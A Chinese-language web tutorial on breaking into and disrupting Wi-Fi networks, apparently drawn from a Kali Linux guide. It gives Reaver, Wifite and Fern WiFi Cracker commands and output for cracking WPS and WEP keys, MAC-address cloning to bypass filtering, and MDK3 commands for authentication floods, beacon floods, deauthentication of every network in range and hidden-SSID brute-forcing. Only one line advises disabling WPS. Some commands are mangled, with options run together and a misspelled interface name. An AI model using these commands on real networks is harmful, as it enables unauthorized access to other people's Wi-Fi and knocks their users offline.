Reaver利用的就是PIN码的缺陷，只要有足够的时间，就能够破解出WPA或WPA2的密码当不指定AP的PIN码值时，可以执行如下命令进行暴力破解如下所示root@kali:～# reaver -i mon0 -b 8C:21:0A:44:09:F8 -vv

执行以上命令后，将输出如下所示的信息Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner 。

[?] Restore previous session for 8C:21:0A:44:09:F8? [n/Y] y #恢复之前的会话以上信息提示是否要恢复之前的会话，这是因为在前面已经运行过该命令这里输入y，将进行暴力破解。

如下所示[+] Restored previous session[+] Waiting for beacon from 8C:21:0A:44:09:F8[+] Switching mon0 to channel 1

[+] Associated with 8C:21:0A:44:09:F8 (ESSID: Test)[+] Trying pin 66665670[+] Sending EAPOL START request

[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message

[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin 77775672

[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message

[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK

[+] Trying pin 88885674[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response

[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK

[+] Sending WSC NACK[+] Trying pin 99995676......[+] Sending EAPOL START request[+] Received identity request

[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message

[+] Received WSC NACK[+] Sending WSC NACK[+] Trying pin 04580027[+] Sending EAPOL START request[+] Received identity request

[+] Sending identity response[+] Received identity request[+] Sending identity response[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK[!] WPS transaction failed (code: 0x02), re-trying last pin......[+] Trying pin 04580027

[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received identity request

[+] Sending identity response[+] Received M1 message[+] Sending M2 message[+] Received M3 message[+] Sending M4 message

[+] Received WSC NACK[+] Sending WSC NACK[+] 91.02% complete @ 2014-11-29 15:51:24 (5 seconds/pin)以上就是暴力破解的过程，在该过程中Reaver尝试发送一系列的PIN码。

当发送的PIN码值正确时，也就表明成功破解出了密码破解成功后，显示的信息如下所示[+] 100% complete @ 2014-11-29 20:10:36 (14 seconds/pin)[+] Trying pin 04588306

[+] Key cracked in 4954 seconds[+] WPS PIN: 04588306[+] WPA PSK: daxueba![+] AP SSID: Test从输出的信息中可以看到，成功破解出了WiFi的密码（PSK码）和PIN码。

如果用户修改了该AP的密码，只要WPS功能开启，使用该PIN码可以再次破解出AP的密码Reaver工具并不是在所有的路由器中都能顺利破解（如不支持WPS和WPS关闭等），并且破解的路由器需要有一个较强的信号，否则Reaver很难正常工作，可能会出现一些意想不到的问题。

整个过程中，Reaver可能有时会出现超时，PIN码死循环等问题一般都不用管它们，只要保持电脑尽量靠近路由器，Reaver最终会自行处理这些问题除此之外，可以在Reaver运行的任意时候按Ctrl+C快捷键终止工作。

这样Reaver会退出程序，但是Reaver下次启动的时候会自动恢复并继续之前的工作，前提是没有关闭或重新启动电脑2、使用Wifite工具Wifite是一款自动化WEP和WPA破解工具，它不支持Windows和OS X操作系统。

Wifite的特点是可以同时攻击多个采用WEP和WPA加密的网络Wifite只需要简单的配置即可自动运行，中间无需手动操作目前，该工具支持任何Linux发行版下面介绍使用Wifite工具破解WPS加密的方法。

Wifite工具在Kali Linux操作系统中已被默认安装下面可以直接使用该工具，它的语法格式如下所示wifite [选项]常用选项含义如下所述● -i：指定捕获的无线接口● -c：指定目标AP使用的信道。

● -dict ：指定一个用于破解密码的字典● -e：指定目标AP的SSID名称● -b：指定目标AP的BSSID值● -wpa：仅扫描WPA加密的网络● -wep：仅扫描WEP加密的网络●

 -pps：指定每秒注入的包数● -wps：仅扫描WPS加密的网络使用Wifite工具破解WPS加密的无线网络具体操作步骤如下所述（1）启动Wifite工具执行命令如下所述root@localhost:～# wifite -pps 660。

.;                     `;,.;  ,;             `;,  `;,   WiFite v2 (r85).;  ,;  ,;     `;,  `;,  `;,::   ::   :   ( )   :   ::   ::  automated wireless auditor

:.  :.  :. /_\ ,:  ,:  ,::.  :.    /___\    ,:  ,:   designed for Linux:.       /_____\      ,:/       \

[+] packets-per-second rate set to 660 packets/sec[+] scanning for wireless devices...[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready.

[0:00:04] scanning wireless networks. 0 targets and 0 clients found以上输出信息显示了Wifite工具的版本信息，支持平台，以及扫描到的无线网络等信息。

当扫描到自己想要破解的无线网络时，按Ctrl+C快捷键停止扫描扫描到的无线网络信息，如下所示[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.

NUM ESSID                    CH      ENCR            POWER   WPS?     CLIENT--- --------------------    ------   --------   ---------   --------   ----------

1  Test                     1       WPA2            77db    wps     client2  Test1                    6       WEP             73db    wps     client

3  yzty                     6       WPA2            66db    wps4  TP-LINK_D7118A           6       WPA2            58db    wps     clients

5  CMCC-AUTO                1       WPA2            49db    no6  CMCC-AUTO                11      WPA2            48db    no

7  CMCC-AUTO                11      WPA2            47db    no8  X_S                      1       WPA2            47db    wps

9  CMCC-AUTO                6       WPA2            46db    no10  TP-LINK_1C20FA           6       WPA2            45db    wps

11  CMCC-AUTO                6       WPA2            44db    no12  xiangr                   9       WPA2            42db    no

13  zhanghu                  11      WPA2            41db    wps14  Tenda_0A4940             7       WPA             41db    no

[0:00:24] scanning wireless networks. 14 targets and 5 clients found从以上输出的信息中可以看到，目前已经扫描到14个无线网络并且可以看到网络的ESSID、工作的信道、加密方式、是否支持WPS及连接的客户端等信息。

（2）按Ctrl+C快捷键停止扫描网络后，将显示如下信息：NUM ESSID                       CH      ENCR     POWER    WPS?          LIENT

--- --------------------    ----  -----   ----------  ------     ----------1  Test1                    6       WEP     45db    wps             client

2  yzty                     6       WPA2    75db    wps             client3  TP-LINK_D7118A           6       WPA2    -13db   wps             clients

4  CMCC-AUTO                11      WPA2    50db    no5  CMCC-AUTO                1       WPA2    50db    no

6  CMCC-AUTO                11      WPA2    47db    no7  CMCC-AUTO                6       WPA2    47db    no

8  X_S                      1       WPA2    47db    wps9  (5A:46:08:C3:99:D3)      6       WPA2    45db    no

10  TP-LINK_1C20FA           6       WPA2    45db    wps11  Test                     1       WPA2    85db    wps             clients

12  CMCC-AUTO                6       WPA2    44db    no13  CMCC-AUTO                11      WPA2    43db    no

14  zhanghu                  11      WPA2    41db    wps15  xiangr                   9       WPA2    41db    no

16  Tenda_0A4940             7       WPA     40db    no[+] select target numbers (1-16) separated by commas, or all:

从以上信息中可以看到，当前无线网卡扫描到16个AP以上信息中共显示了7列，每列分别表示AP的编号、ESSID号、信道、加密方式、信号强度、是否开启WPS，以及连接的客户端其中，POWER列值的绝对值越小，信号越强。

（3）此时，要求选择攻击的AP从以上信息中可以看到，搜索到的无线AP中Test1是使用WEP加密的，并且开启了WPS功能所以，为了能快速地破解出密码，这里选择第一个AP，输入编号1，将显示如下所示的信息：。

[+] select target numbers (1-16) separated by commas, or all: 1[+] 1 target selected.[0:10:00] preparing attack "Test1" (14:E6:E4:84:23:7A)

[0:10:00] attempting fake authentication (1/5)...  success![0:10:00] attacking "Test1" via arp-replay attack

[0:09:30] started cracking (over 10000 ivs)[0:09:24] captured 16513 ivs @ 892 iv/sec[0:09:24] cracked Test1 (14:E6:E4:84:23:7A)! key: "3132333435"

[+] 1 attack completed:[+] 1/1 WEP attacks succeededcracked Test1 (14:E6:E4:84:23:7A), key: "3132333435"

[+] disabling monitor mode on mon0... done[+] quitting从以上输出的信息中可以看到，已成功破解出了Test1WiFi网络的加密密码为3132333435。

该值是ASCII码值的十六进制，将这个值转换为ASCII码值后，结果是123453、使用Fern WiFi Cracker工具Fern WiFi Cracket是一种无线安全审计和攻击软件编写的程序，使用的是Python

编程语言和Python的Qt图形界面库该工具可以破解并恢复出WEP、WPA和WPS键的无线网络密码下面介绍使用Fern WiFi Cracker工具破解WPS加密的方法使用Fern WiFi Cracker工具破解WPS加密的WiFi网络。

具体操作步骤如下所述（1）启动Fern WiFi Cracker工具。执行命令如下所示。root@kali:～# fern-wifi-cracker执行以上命令后，将显示如图46所示的界面。

图46  Fern WiFi Cracker主界面（2）在该界面选择无线网络接口，并单击Scan for Access Points图标扫描无线网络，如图47所示。

图47  设置提示对话框（3）该界面显示了扫描技巧设置信息在这里单击OK按钮，将显示如图48所示的界面如果不想在下次启动Fern WiFi Cracker工具时，再次弹出该对话框的话，可以在该界面勾选Dont show this message again的复选框。

图48  扫描无线网络（4）在该界面可以看到扫描到的使用WEP和WPA加密的所有WiFi网络可以选择任何一个WiFi网络进行破解这里选择WEP加密的，所以单击WiFi WEP图标，将显示如图49所示的界面。

图49  选择攻击目标（5）从该界面可以看到，只有一个Test1无线网络，并且该网络支持WPS功能所以，可以选择WPS攻击方法来破解出网络的密码（6）在该界面选择攻击目标Test1，并单击RegularAttack按钮。

然后选择Automate复选框，并单击WiFi Attack按钮开始暴力破解，如图50所示

图50  正在破解（7）从该界面可以看到，正在进行破解密码在该界面以百分比的形式显示破解的进度，当破解成功后将会在进度条框下显示破解出的密码但是此过程的时间相当长，需要用户耐心的等待通过使用以上工具破解WPS加密，可以发现使用该加密方式是非常不安全的。

所以，为了使自身的无线网络安全，最好将WPS功能禁用，手动设置WPA2加密攻击1. 突破MAC地址过滤无线MAC地址过滤功能通过MAC 地址允许或拒绝无线网络中的计算机访问广域网，有效控制无线网络内用户的上网权限。

例如，在公司网络中，一台路由器下面连接多台电脑，公司规定只有在线客服人员的电脑可以上网，其他部门员工的电脑不允许连接互联网这时候就可以通过路由器MAC地址过滤功能来进行设置，只需要把客服部门员工的电脑的MAC 地址添加到MAC 地址过滤列表中，并设置只有列表中的MAC地址的电脑可以上网即可。

这样设置之后，未经授权的客户端无论是通过有线还是无线的方式，都无法访问无线路由器，都会弹出无法连接的错误提示，同时，未经授权的客户端也将无法通过该路由器访问外部互联网有一些人认为Wi-Fi设置了MAC过滤就安全无事，不用加密码了，其实这种观点是错的，其实一台电脑绕过MAC过滤比破解还简单，如MAC地址克隆。

首先使用Airodump-ng并选择特定的BSSID来进行扫描，这样可以获得当前连接的用户，如图1所示。

图1  获得当前连接的用户选择STATION中的任意一员合法用户的MAC地址来进行伪装root@kali:～# ifconfig wlan0 downroot@kali:～# ifconfig wlan0 hw ether MAC地址。

root@kali:～# ifconfig wlan0 up然后再去连接网络即可，路由器并不会踢掉原来的用户，而会给这个相同的MAC地址再分配一个IP，这样就突破了MAC地址过滤2. 无线DOS攻击DOS，全称为Deny of Service，是网络攻击最常见的一种。

它故意攻击网络协议的缺陷或直接通过某种手段耗尽被攻击对象的资源，目的是让目标计算机或网络无法提供正常的服务或资源访问，使目标系统服务停止响应甚至崩溃，而在此攻击中并不入侵目标服务器或目标网络设备这些服务资源包括网络宽带、系统堆栈、开放的进程或允许的连接。

这种攻击会导致资源耗尽，无论计算机的处理速度多快，内存容量多大，网络带宽的速度多快，都无法避免这种攻击带来的后果任何资源都有一个极限，所以总能找到一个方法使请求的值大于该极限值，导致所提供的服务资源耗尽。

MDK3是一款集成在BackTrack3上的无线DOS攻击测试工具，能够发起BeaconFlood、Authentication DoS、Deauthentication/Disassociation Amok等模式的攻击，另外它还具有针对隐藏ESSID的暴力探测模式、802.1X渗透测试、WIDS干扰等功能。

Authentication DoS验证洪水攻击，这是一种验证请求攻击模式，在这个模式里，软件自动模拟随机产生的MAC向目标AP发起大量验证请求，可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应；这个模式常见的使用是在reaver穷举路由PIN码，用这个模式来直接让AP停止正常响应，迫使AP主人重启路由。

$ mdk3 wlan0mon a-a BSSID-s 1000a是指Authentication DoS模式，-a是指指定的BSSID，如果不使用-a选项，那么意味着MDK3会对当前能够搜索到的全部无线网络进行随机性攻击，也就是无差别攻击，-s是指速率，如图2所示。

图2  MDK3攻击如图3所示，原来连接的是 FAST 网络，过了一段时间后突然断网连上了另一个Wi-Fi，如图4所示。

图3  原网络

图4  现网络因此，用户在过程中被踢下线了。然后使用 Airodump-ng 扫描网络，发现找不到 FAST网络了，这样路由器崩溃了，只能去手动重启，如图5所示。

图5  FAST网络丢失Beacon flood mode这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表，从而扰乱无线使用者；甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式（如WEP/WPA2）等。

$ mdk3 wlan0mon b-f ssid-t-s 1000b是指Beacon flood mode模式，-f指定从文件中读取死亡SSID名称，-t为WPA TKIP，-w为WEP，-a为WPA AES，-c可以选择信道，-s指定分组发送速率，默认50。

打开无线网络，可以看到充斥了大量的由MDK3产生的死亡SSID，如图6所示。

图6  死亡SSID列表Deauthentication/Disassociation Amok强制解除验证解除连接，在这个模式下，软件会向周围所有可见AP发起循环攻击，可以造成一定范围内的无线网络瘫痪（当然有白名单、黑名单模式），直到手动停止攻击。

Basic probing and ESSID Bruteforce基本探测AP信息和ESSID猜解模式隐藏SSID是一种防蹭网的有效的方法隐藏SSID后，网络名称对其他人来说是未知的，可以有效防止陌生无线设备的接入。

$ airodump-ng wlan0mon找出隐藏的SSID，在ESSID位上显示为的即为隐藏SSID，记录下其BSSID进行破解，如图7所示。

图7  隐藏的BSSID$ mdk3 wlna0mon p-b a-t BSSID-s 1000可以看到MDK3在暴力破解，从1个字符开始进行尝试，如图8所示。

图8  MDK3暴力破解

免责声明：本站所有信息均搜集自互联网，并不代表本站观点，本站不对其真实合法性负责。如有信息侵犯了您的权益，请告知，本站将立刻处理。联系QQ：1640731186